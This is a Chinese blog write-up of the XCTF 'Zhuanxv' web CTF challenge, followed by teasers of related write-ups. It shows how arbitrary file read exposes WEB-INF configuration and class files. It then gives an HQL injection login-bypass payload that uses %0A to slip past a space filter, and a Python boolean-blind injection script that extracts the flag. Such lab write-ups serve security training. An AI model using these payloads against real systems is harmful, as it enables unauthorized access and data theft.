【xctf之Zhuanxv】

最新推荐文章于 2025-05-16 11:14:39 发布
最新推荐文章于 2025-05-16 11:14:39 发布
阅读量820 收藏 1
点赞数 1
分类专栏: CTF 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40646572/article/details/127296183
版权

在这里插入图片描述
打开链接地址,发现就一个这,没任何提示。那就web目录先来一波扫描。
在这里插入图片描述
发现了一个页面,先看下。
在这里插入图片描述
是个后台登陆界面,大胆猜测存在弱口令?爆破失败。
没办法了,先看看网页源码还有网络请求吧。
在这里插入图片描述
看到这个请求是请求背景图片加载,看着和正常的图片加载感觉不太一样,是不是存在任意文件读取呢?
尝试文件读取fuzz,失败。(有一说一,到这我就没思路了。。。。。我是真的菜。)
看了官方writeup,发现github搜索了下Zhuanxv,可是我找到git项目的时候啥也没有就一个没用的默认用户和密码。后来又看了几个writeup,发现
在这里插入图片描述
相信对java开发了解点的都知道这是javaweb项目的特点。
那么java项目就有一个特点了/WEB-INF/web.xml这是肯定存在的,那就先fuzz下。
在这里插入图片描述
在这里插入图片描述
下载的是个图片,将图片格式改成xml格式,发现确实可以存在任意文件读取的漏洞。
通过web.xml我们可以看到mvc模型中view层采用了struts2框架,百度下struts2框架的配置文件先。
在这里插入图片描述
我们发现struts2的配置文件为struts.xml通常放在/WEB-INF/class/struts.xml.
可以下载下来。
在这里插入图片描述
发现了配置action的类文件,这些类文件全部在/WEB-INF/class/目录下,可以下载下来,然后使用jd-gui反编译后可以查看源码。
看完反编译后的源码发现,信息不够。正常来讲,github上的项目应该给我们一个框架提示,但我看的时候是什么也没有了。正常情况下一般要不放弃了,如果熟悉java开发框架的话,都应该清楚,一般javaweb开发前端使用struts2,大概率是ssh框架整合,struts2,spring,hibernate。那先找下spring框架的配置文件还有hibernate框架的配置文件吧。
在这里插入图片描述
正常情况下ssh框架配置如上,我们发现applicationContext.xml文件在src文件夹下,这个文件我们是无权限访问的,我们只能在webroot目录下读取文件,甚至正常情况下,我们只能读取.jsp文件才对,WEB-INF目录中的文件也不可以被读取的,但谁让这个项目存在任意文件读取呢。
在这里插入图片描述
经过百度,发现applicationContext.xml文件也可以存在于WEB-INF下面。
成功下载下来了。
在这里插入图片描述
看到这就知道这个确实是ssh框架整合的javaweb项目了。
在这里插入图片描述

把上面爆露出的class文件下载下来,发现UserServiceImpl.class中过滤了=与空格。
在这里插入图片描述
这个会将name中的空格与等号使用空白符替代,并且在下面的if判断中判断通过正则匹配的password是否是只存在字母与数字,如果是就返回过滤后的name以及password。
在这里插入图片描述
hsql语句如上,好了,到这才明白这个是让我们使用sql注入的方式进行获取flag。
尝试下注入登录。
在这里插入图片描述
ok,成功登录。

payload=admin'
or
'1'>'0'
or
name
like
'admin

在这里插入图片描述
此处限制了我们必须找到一个存在账户,并且只能是一个。所以必须有个like。
那么flag大概率存在数据库中。
不要忘记,我们还有一个信息没有使用,hiberbate配置文件。
在这里插入图片描述
user.hbm.xml文件,下载这个文件同理applicationContext.xml下载地址。
在这里插入图片描述
我们可以看到,对应表格以及falg对应的cloumn。

我们只能使用盲注,而盲注一般为基于布尔型与基于时间的注入,这里最方便的就是基于布尔型注入。

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
        payload="(select%0Aascii(substr(welcometoourctf,"+str(i)+",1))%0Afrom%0AFlag)<'"+str(j)+"'"
        url="http://61.147.171.105:56092/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print(str(i)+":"+flag)
            break
        p=chr(j)

这也是官方writeup给的脚本,唯一不同的就是官方wirte给的 是使用id列注入,我用的就是welcometoourctf列进行注入的。

总结:总体来讲这道题,较为复杂,难点在于信息的搜集,从登陆页面发现任意文件读取,到发现web项目是ssh框架集成,再到下载/WEB-INF目录下的文件。这道题很需要细心和耐心。

参考链接

xctf官方链接:https://adworld.xctf.org.cn/challenges/write-up?hash=ab3e7454-5dc0-4157-8c3d-d77e5e1b7de0_2

【网络安全 | XCTF】Python之Django模块+curl 攻防世界 Cat 解题详析
等风来
05-30 5394
无回显,可能是因为/opt/api/是整个API项目的根目录,而/opt/api/api/是API应用程序的特定子目录,用于存放与API功能相关的文件。使用@+文件路径时,CURL将自动读取该文件内容并将其作为请求参数。这是python的Django模块,其数据库database文件存在于opt/api下的setting.py文件中。当使用文件路径作为参数时,若文件路径指定有误或不存在,则无法正确读取文件内容。flag为:WHCTF{yoooo_Such_A_G00D_@}题目描述:抓住那只猫。
XCTF 之warm up(代码审计分析)
sunleibaba的博客
01-20 760
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的类。 第4行和第11行语句是定义类的固定语法。 第5行:利用静态方法
攻防世界web进阶区zhuanxv
gongjingege的博客
08-10 644
SCTF 题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务 打开链接是一个显示时间的页面 dirsearch扫一下 打开list页面 抓包看一下 看到JSESSIONID,得知是java web,读取配置文件web.xml 考虑了一下会不会是sql注入 看看源码,里边有个导入路径 打开url 会下载一张图片,但不能查看,notepad++看下源码 这里struts2有另一个大佬的解释 https://www.cnblogs.com/mke2fs/p/11519039.html 然后
xctf攻防世界 Web高手进阶区 Zhuanxv
l8947943的博客
01-07 1582
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1965
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
攻防世界web进阶区Zhuanxv详解
hxhxhxhxx的博客
08-13 1776
攻防世界web进阶区Zhuanxv详解题目提示:详解 题目 提示: 详解 扫描目录发现了一个list 我们使用了好几个扫描工具,只有wwwscan,和webdirscan可以,(可能是我字典太菜了) 发现需要登录 查看源代码发现,这里有问题,加载图片的方式很诡异 试试文件读取 他的cookie里有jessionid 说明他是使用JAVA写的网页 那么我们尝试找找web.xml strust ...
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 949
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界 web高手进阶区 7分题 Zhuanxv
闵行小鱼塘
08-12 764
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Zhuanxv的writeup
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?fileName=web_login_bg.jpg ,找到任意文件下载点,下载一系列文件。这里限制了下载文件的后缀只有class xml jpg css等。 第三步:代码审计 根据github的commit记录 了解实现类的位置。 从user.hbm.xml得知表名和类名映射 从com/cuitctf/service/impl/UserServiceImpl.class得知过滤规则,用户名只过滤空格和等号,密码限制只能字母+数字 从com/cuitctf/dao/i
攻防世界 WEB ZHUANXV
qq_41696858的博客
09-07 483
打开场景,根据提示提示,扫描目录,扫出来一个/list,提示要先登录,先抓个包看看,在第二个包出抓到了形如/loadimage?fileName=web_login_bg.jpg 再熟悉不过了,文件包含,结合cookie里的phpsession和jsessionid可以判断出,后端同时使用了java和php 那么,既然是java项目,就尝试读取一下web.xml,这个是javaweb项目最基础的一个xml文件,一般再WEB-INF目录下 构造/loadimage?fileName=…/…/WEB-INF/w
CTF 之Zhuanxv
qq_74263993的博客
04-04 1008
UserServiceImpl.class反编译后代码中是对空格进行了过滤,而sql中对回车自动过滤, 因此我们可以将空格字符换成%0A(ascii码表示换行符)。User.class反编译后是一个Bean文件,UserLoginAction.class反编译后是登录验证逻辑文件,InitApplicationContext.class反编译后是类加载器文件。其中暴露了使用的数据库,数据库账号密码,且其中包含了user.hbm.xml等配置文件,同样我们将其下载出来。很可惜进来了还是没有一点线索。
BUUCTF WEB zhuanxv
qq_41696858的博客
03-25 724
这题和攻防世界是一样的,但是由于BUUCTF靶场的设置问题,导致很多人脚本跑不出来,具体可以看这篇 https://blog.youkuaiyun.com/qq_41696858/article/details/120156854 对脚本做个简单修正 import requests import time s = requests.session() list=[6,7,8,9,10,11,12,13,15,16,17,18,20,21,22,23,25,26,27,28,30,31,32,33,34,35,36,37
【愚公系列】2023年06月 攻防世界-WebZhuanxv
时光隧道
06-18 4106
dirsearch是一个用于寻找Web服务器上隐藏目录和文件的Python脚本。它可以帮助您发现会被忽视的文件和文件夹,从而提高Web应用程序的安全性。暴力枚举目录和文件搜索常用的Web目录和文件查找隐藏的Web页面和应用程序检查Web服务器配置错误使用dirsearch需要在命令行中输入一些参数和选项。暴力枚举目录: dirsearch.py -u -e搜索常用的Web目录和文件: dirsearch.py -u -w。
XCFVXCV
xyfrihbq44的专栏
11-22 224
VVVVVVVVVVVVVVV
XCTF_Shuffle
TA不懒,但还没有添加简介
01-07 122
XCTF_Shuffle
ctf杂项各类编码汇总
bwt_D的博客
05-19 2859
ascii编码 base64编码 url编码:%61%6c%66%7b%67%79%72%63%74%70%72%67%6f%70%61%69%5f%79%5f%73%73%61%65%7d%79 shellcode编码:\x54\x68\x65\x20 Quoted-printable(针对非英文,不会考):=E6=95=8F=E6=8D=B7… uuencode(没有特点) unicode(一般不考) 莫尔斯电码(经常考 short ook: . ? ! c8 e9 ac a0 c6 f2 e
WEB安全--Java安全--shiro550反序列化漏洞
最新发布
m0_74800552的博客
05-16 491
shiro550反序列化
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值